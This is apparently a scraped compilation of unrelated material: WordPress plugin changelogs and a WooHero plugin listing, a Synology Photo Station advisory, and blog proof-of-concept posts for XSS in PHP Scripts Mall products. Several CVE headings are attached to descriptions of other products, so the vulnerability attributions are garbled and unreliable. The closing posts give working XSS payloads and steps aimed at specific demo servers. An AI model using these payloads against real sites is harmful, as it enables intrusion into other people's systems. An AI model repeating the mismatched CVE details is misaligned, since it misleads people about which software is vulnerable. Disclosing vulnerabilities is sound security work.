    The value of parameter “guide” are “week” or “1week”.  
    In a case of “1week”, the link to next week and previous week are not shown.  
    Parameter “guide” may omit. If “guide” is omitted, the link to each date is not shown.
    
*   Parameter “past” was added to short code [attmgr_daily] and [attmgr_weekly_all] and [attmgr_monthly_all].  
    usage(1): [attmgr_daily guide="week" past="0"]  
    usage(2): [attmgr_weekly_all past="0"]  
    In this case, the link to the past is not shown.  
    Parameter “past” may omit, and default value of “past” is “true”.
    
*   “font-size” in the of schedule table was changed.(front.css)
    

**0.4.4**

*   Parameter “hide” was added to short code [attmgr_weekly].  
    usage: [attmgr_weekly id="xx" hide="1"]  
    In this case, it doesn’t show anything.  
    Parameter “hide” may omit, and default value of “hide” is “false”.

**0.4.3**

*   Bug fix.
*   Some filters were added.
*   Media query is added to “front.css”.

**0.4.2**

*   Some filters were added.

**0.4.1**

*   Bug fix in “Monthly schedule”.

**0.4.0**

*   When time table is up to the next day like “23:00~08:00”, the schedule which continues from the previous day is displayed in “Today’s staff” until end time. (In this case, It is until 8:00.)
    
*   Time selection of a scheduler is helped.  
    When the start time was chosen, standard end time is chosen automatically.  
    And, the choices of end time are limited to time which is later from the start time.  
    If start time which is later from the end time is chosen, end time would be reset.
    

**0.3.1**

*   Bug fix.

**0.3.0**

*   Some style classes were added.
*   Bug fix.

**0.2.0**

*   first release.

CVE-2019-5970: Attendance Manager

Cross-site request forgery (CSRF) vulnerability in Personalized WooCommerce Cart Page 2.4 and earlier allows remote attackers to hijack the authentication of administrators via unspecified vectors.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

WOOHero is just a great WooCommerce extension to customize any store. Like change button text/labels, add contents and much more. WOOHero is compatible with all WooCommerce themes.  
No coding experience requires to change button text/label, add new contents inside WooCommerce core pages. WOOHero nice and simple  
settings will handle all for you. Following details and screenshots explaining all powerful feature of WOOHero.

**Getting Started Video**

**Customize/Change Text**

1.  Add to cart (Single product)
2.  Add to cart (Shop/Loop)
3.  Out of stock (Single product)
4.  View product (Grouped product – Shop/Loop)
5.  Select options (Variable products – Shop/Loop)
6.  Buy product (External product – Shop/Loop)
7.  Place order (Checkout page)

**Customize WooCommerce Core Pages**

1.  Before cart table
2.  Before cart contents
3.  Cart contents
4.  After cart contents
5.  After cart table
6.  After cart
7.  Proceed to checkout
8.  Cart coupon
9.  After cart totals
10.  Before cart totals
11.  Cart is empty
12.  Before mini cart (cart in widget)
13.  Widget shopping cart before buttons
14.  After mini cart
15.  Cart totals before shipping
16.  Cart totals after shipping
17.  Cart totals before order total
18.  Cart totals after order total
19.  Before shipping calculator
20.  After shipping calculator

**WooCommerce Actions/Hooks**

WOOHero using Woocommerce core hooks/actions to customize, zero coding requires. Just install and use.  
Details Here

**WOOHero PRO Features**

WOOHero PRO has more powerful feature and control to customize your store like:

*   **Customize Shop/Store page**
*   **Customize Product page**
*   **Customize My account page**
*   **Customize Checkout page**
*   **Customize Thanks page**
*   **Customize Change button titles (add to cart etc)**
*   **Customize Product Page**
*   **Disable Related Products**
*   **Customize Related Products**
*   **Add Unlimited Product Tabs**
*   **Enquiry/Get a Quote Form for Product**
*   **Front-end editor to add/edit contents**

**Change Any Text**

Another a cool feature of WOOHero PRO version is that you can change Any text from entire site. Like if you want to change ‘Billing Address’ text on checkout  
page, you can do this with WOOHero PRO.

Get Pro Version

1.  Upload plugin directory to the /wp-content/plugins/ directory
2.  Activate the plugin through the ‘Plugins’ menu in WordPress
3.  After activation, you can set options from WooCommerce -> WooHero menu

**DO I need to make changes in file?**

No

**How to access settings**

In Dashboard, you will menu title WooCommerce -> WooHero

**Will this work with my Theme?**

Yes, it is compatible with all themes.

I used it just now and it’s great! In fact, it’s super powerful for being free.

Plugin functionality and working is awesome. The only suggestion is you just need to improve its backend style and usage directions. It shouldn't have a separate menu it should be somewhere in woo-commerce settings.

Great. I can change text almost anywhere in WooCommerce 🙂 Good for non technical users.

Read all 10 reviews

“WooHero WooCommerce Store Customizer” is open source software. The following people have contributed to this plugin.

Contributors

*    N-Media

**3.4 January 19, 2022**

*   Tweaks: WC latest version check

**3.3 September 19, 2021**

*   WC latest version updated
*   Bug fixed: Product tabs HTML issue fixed

**3.2 June 19, 2020**

*   Feature: It will display a Button on Cart page to remove all Cart Items.
*   Feature: It will hide content on the product page and add to cart button. Just show the login form

**3.1 Jan 11, 2020**

*   Bug fixed: Change Any Text

**3.0 Nov 17, 2019**

*   Feature: Re-arranged settings tabs
*   Feature: Front-end editor to add/edit contents
*   Feature: Disable/Enable related products, set column size
*   Feature: Products limit and columns size in Shop page.
*   Feature: More actions added to on checkout page.
*   Feature: Compatibility check with latest WooCommerce, PHP and WordPress

**2.5 June 3, 2019**

*   Bug fixed: Some security related issue fixed

**2.4 October 23, 2018**

*   Bug fixed: Settings saving issue in php version 7+ fixed.

**2.3 July 28, 2018**

*   Bug fixed: Menu moved under WooCommerce Manin Menu

**2.2 July 21, 2018**

*   Bug fixed: Menu not shown due to some other plugin conflict, it’s fixed now

**2.1 July 14, 2018**

*   Bug fixed: Warnings removed
*   Compatibility check with WooCommerce

**2.0**

*   WooCommerce 3.0 compatible issue fixed.

**1.2**

*   Some minor changes made in options page.

**1.1****Following button title/labels can be change**

*   Add to cart (Single product)
*   Add to cart (Shop/Loop)
*   Out of stock (Single product)
*   View product (Grouped product – Shop/Loop)
*   Select options (Variable products – Shop/Loop)
*   Buy product (External product – Shop/Loop)
*   Place order (Checkout page)

**1.0**

*   It is first version, and working perfectly

CVE-2019-5979: WooHero WooCommerce Store Customizer

Relative path traversal vulnerability in SYNO.PhotoStation.File in Synology Photo Station before 6.8.11-3489 and before 6.3-2977 allows remote attackers to upload arbitrary files via the uploadphoto parameter.

**Abstract**

These vulnerabilities allow remote attackers to execute arbitrary SQL commands and remote authenticated users to upload arbitrary files via a susceptible version of Photo Station.

**Affected Products**

Product

Severity

Fixed Release Availability

Photo Station 6.8

Important

Upgrade to 6.8.11-3489 or above.

Photo Station 6.3

Important

Upgrade to 6.3-2977 or above.

**Mitigation**

None

**Detail**

*   CVE-2019-11821
    
    *   Severity: Important
    *   CVSS3 Base Score: 7.3
    *   CVSS3 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    *   SQL injection vulnerability in synophoto\_csPhotoDB.php in Synology Photo Station before 6.8.11-3489 and before 6.3-2977 allows remote attackers to execute arbitrary SQL command via the type parameter.
*   CVE-2019-11822
    
    *   Severity: Moderate
    *   CVSS3 Base Score: 4.3
    *   CVSS3 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
    *   Relative path traversal vulnerability in SYNO.PhotoStation.File in Synology Photo Station before 6.8.11-3489 and before 6.3-2977 allows remote attackers to upload arbitrary files via the uploadphoto parameter.

**Acknowledgement**

Independent security researcher, MengHuan Yu, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.

**Revision**

Revision

Date

Description

1

2019-01-02

Initial public release.

2

2019-06-30

Disclosed vulnerability details.

CVE-2019-11822: Synology_SA_19_01 | Synology Inc.

PHP Scripts Mall Chartered Accountant : Auditor Website 2.0.1 has Stored XSS in the Profile Update page via the My Name field.

**CVE-2019-7553 Stores XSS in PHP Scripts Mall Chartered Accountant : Auditor Website 2.0.1**

**_DESCRIPTION_**

**PHP Scripts Mall Chartered Accountant : Auditor Website 2.0.1 has**  
 **Stored XSS in the Profile Update page via the My Name field.**  

**_VENDOR_**

PHP Scripts Mall Pvt. Ltd.  
 _\[Affected Product Code Base\]_PHP Scripts Mall Chartered Accountant : Auditor Website - 2.0.1  
  

**_POC_**

 Steps to reproduce-

Go to http://74.124.215.220/~projclient/client/auditor

 1. Register and login an account.

2\. GO to My Profile and update the My name field with the xss payload

  <--\`<img/src=\` onerror=alert("Pw")> --!>.

3\. The xss will be executed throughout all the pages visited.

**Popular posts from this blog**

DESCRIPTION An issue was discovered in PHP Scripts Mall Investment MLM Software 2.0.2.  Stored XSS was found in the the My Profile Section. This is due to lack of sanitization in the Edit Name section. VENDOR PHP Scripts Mall Pvt. Ltd.   \[Affected Product Code Base\] Investment MLM Software(link- https://www.phps criptsmall.com/product/investm ent-mlm/ ) - 2.0.2 POC 1.GO to  http://198.38.86.159/~onlineex amboard/demo/investment-mlm/ 2. Request a test account "Click Here For User Demo Link" 3. Login and go to my profile. 4. Input payload  <script>alert(document.domain) </script>  and xss gets popped. PROOF

DESCRIPTION An issue was discovered in PHP Scripts Mall API Based Travel Booking 3.4.7. There is Reflected XSS via the flight-results.php d2 parameter. Tested in Firefox Dev Edition VENDOR PHP Scripts Mall Pvt. Ltd.   \[Affected Product Code Base\] API based travel booking - 3.4.7 POC 1.GO to  http://74.124.215.220/~config/cleotravel/flight-results.php?a1=adf&a2=adfdf&d1=&d2=%22Style=%22position:fixed;top:0;left:0;font-size:999px;%22OnMouseEnter=%22confirm\`K\`%22 REFLECTED XSS POPPED

Tag

#php